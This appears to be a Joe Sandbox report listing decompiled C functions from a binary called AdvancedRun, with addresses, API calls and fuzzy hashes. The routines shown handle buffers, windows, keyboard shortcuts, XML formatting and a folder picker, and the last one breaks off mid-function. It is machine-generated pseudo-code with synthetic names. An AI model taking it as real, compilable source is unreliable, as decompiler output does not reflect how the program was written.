                                                                  C-Code - Quality: 89%
                                                                  			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                  0x004083dc
                                                                  0x004083e2
                                                                  0x004083e9
                                                                  0x004083ea
                                                                  0x004083eb
                                                                  0x004083f3
                                                                  0x004083f6
                                                                  0x004083f8
                                                                  0x00408401
                                                                  0x00408404
                                                                  0x00408407
                                                                  0x00408409
                                                                  0x0040840c
                                                                  0x00408413
                                                                  0x0040841d
                                                                  0x00408427
                                                                  0x0040842c
                                                                  0x0040842f
                                                                  0x00408432
                                                                  0x00408435
                                                                  0x00408438
                                                                  0x00408439
                                                                  0x0040843e
                                                                  0x0040843f
                                                                  0x00408442
                                                                  0x0040844a

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$??2@??3@
                                                                  • String ID:
                                                                  • API String ID: 1252195045-0
                                                                  • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                  • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                  • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                  • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 76%
                                                                  			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                  0x00406746
                                                                  0x00406746
                                                                  0x0040674f
                                                                  0x00406751
                                                                  0x00406752
                                                                  0x00406757
                                                                  0x00406758
                                                                  0x0040675d
                                                                  0x0040675f
                                                                  0x00406760
                                                                  0x00406765
                                                                  0x00406766
                                                                  0x0040676e
                                                                  0x00406770
                                                                  0x00406771
                                                                  0x00406776
                                                                  0x00406777
                                                                  0x0040677f
                                                                  0x00406781
                                                                  0x00406785
                                                                  0x00406787
                                                                  0x00406788
                                                                  0x0040678e
                                                                  0x0040678e
                                                                  0x00406790
                                                                  0x00406791
                                                                  0x00406796
                                                                  0x00406798
                                                                  0x0040679e
                                                                  0x004067a1
                                                                  0x004067a4
                                                                  0x004067ab

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID:
                                                                  • API String ID: 613200358-0
                                                                  • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                  • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                  • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                  • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 87%
                                                                  			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                  0x0040aba8
                                                                  0x0040aba9
                                                                  0x0040abb0
                                                                  0x0040abb2
                                                                  0x0040abb5
                                                                  0x0040ac19
                                                                  0x0040ac2c
                                                                  0x0040ac2e
                                                                  0x0040ac36
                                                                  0x0040ac39
                                                                  0x0040ac39
                                                                  0x0040ac1b
                                                                  0x0040ac21
                                                                  0x0040ac21
                                                                  0x0040abb7
                                                                  0x0040abcb
                                                                  0x0040abce
                                                                  0x0040abd7
                                                                  0x0040abe6
                                                                  0x0040abf6
                                                                  0x0040abfe
                                                                  0x0040ac09
                                                                  0x0040ac0f
                                                                  0x0040ac12
                                                                  0x0040ac4f

                                                                  APIs
                                                                  • BeginDeferWindowPos.USER32(00000003), ref: 0040ABBA
                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32 ref: 00402EB4
                                                                  • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                  • String ID: $
                                                                  • API String ID: 2498372239-3993045852
                                                                  • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                  • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                  • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                  • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                  0x00403a7d
                                                                  0x00403a8c
                                                                  0x00403a9c
                                                                  0x00403aba
                                                                  0x00403adf
                                                                  0x00403ae7
                                                                  0x00403af4
                                                                  0x00403af4
                                                                  0x00403ae7
                                                                  0x00403aba
                                                                  0x00403a9c
                                                                  0x00403b13

                                                                  APIs
                                                                  • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                    • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                  • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: State$CallMessageProcSendWindow
                                                                  • String ID: A
                                                                  • API String ID: 3924021322-3554254475
                                                                  • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                  • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                  • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                  • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 91%
                                                                  			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                  0x004034f0
                                                                  0x004034f8
                                                                  0x00403506
                                                                  0x00403516
                                                                  0x0040351c
                                                                  0x00403531
                                                                  0x00403537
                                                                  0x00403545
                                                                  0x0040354a
                                                                  0x00403556
                                                                  0x00403567
                                                                  0x00403575
                                                                  0x00403583
                                                                  0x00403583
                                                                  0x00403586
                                                                  0x00403592
                                                                  0x00403598
                                                                  0x004035ac

                                                                  APIs
                                                                    • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                  • memset.MSVCRT ref: 00403537
                                                                  • _ultow.MSVCRT ref: 00403575
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$memset$_ultow
                                                                  • String ID: cf@$q
                                                                  • API String ID: 3448780718-2693627795
                                                                  • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                  • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                  • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                  • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 64%
                                                                  			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                  0x00407e2d
                                                                  0x00407e46
                                                                  0x00407e48
                                                                  0x00407e4d
                                                                  0x00407e5f
                                                                  0x00407e6b
                                                                  0x00407e6f
                                                                  0x00407e75
                                                                  0x00407e7c
                                                                  0x00407e7d
                                                                  0x00407e88
                                                                  0x00407e8d
                                                                  0x00407e8e
                                                                  0x00407eaa

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00407E48
                                                                  • memset.MSVCRT ref: 00407E5F
                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                  • _snwprintf.MSVCRT ref: 00407E8E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                  • String ID: </%s>
                                                                  • API String ID: 3400436232-259020660
                                                                  • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                  • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                  • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                  • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 77%
                                                                  			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                  0x00405e0a
                                                                  0x00405e12
                                                                  0x00405e18
                                                                  0x00405e1c
                                                                  0x00405e1e
                                                                  0x00405e1e
                                                                  0x00405e24
                                                                  0x00405e2c
                                                                  0x00405e2e
                                                                  0x00405e44
                                                                  0x00405e49
                                                                  0x00405e4c
                                                                  0x00405e4d
                                                                  0x00405e68
                                                                  0x00405e74
                                                                  0x00405e74
                                                                  0x00000000
                                                                  0x00405e84
                                                                  0x00405e8c

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                  • String ID: caption
                                                                  • API String ID: 1523050162-4135340389
                                                                  • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                  • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                  • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                  • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                  0x00409a4a
                                                                  0x00409a4f
                                                                  0x00409a56
                                                                  0x00409a5e
                                                                  0x00409a60
                                                                  0x00409a6e
                                                                  0x00409a6e
                                                                  0x00409a60
                                                                  0x00409a71
                                                                  0x00409a76
                                                                  0x00000000
                                                                  0x00409a78
                                                                  0x00000000
                                                                  0x00409a89

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                  • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                  • API String ID: 946536540-379566740
                                                                  • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                  • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                  • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                  • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 93%
                                                                  			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                  0x0040588e
                                                                  0x0040588f
                                                                  0x0040588f
                                                                  0x00405892
                                                                  0x00405896
                                                                  0x004058a9
                                                                  0x004058a9
                                                                  0x004058ad
                                                                  0x004058af
                                                                  0x004058b5
                                                                  0x004058b6
                                                                  0x004058b9
                                                                  0x004058c2
                                                                  0x004058c3
                                                                  0x004058c8
                                                                  0x004058d2
                                                                  0x004058d4
                                                                  0x004058d9
                                                                  0x004058e0
                                                                  0x004058ea
                                                                  0x004058ec
                                                                  0x004058ed
                                                                  0x004058f2
                                                                  0x004058f9
                                                                  0x00405902
                                                                  0x00405898
                                                                  0x00405898
                                                                  0x0040589a
                                                                  0x0040589c
                                                                  0x004058a1
                                                                  0x004058a2
                                                                  0x004058a5
                                                                  0x004058a7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004058a7
                                                                  0x00405912
                                                                  0x00405915
                                                                  0x0040591e
                                                                  0x0040591e
                                                                  0x00405907
                                                                  0x0040590b

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@??3@memcpymemset
                                                                  • String ID:
                                                                  • API String ID: 1865533344-0
                                                                  • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                  • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                  • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                  • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 37%
                                                                  			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
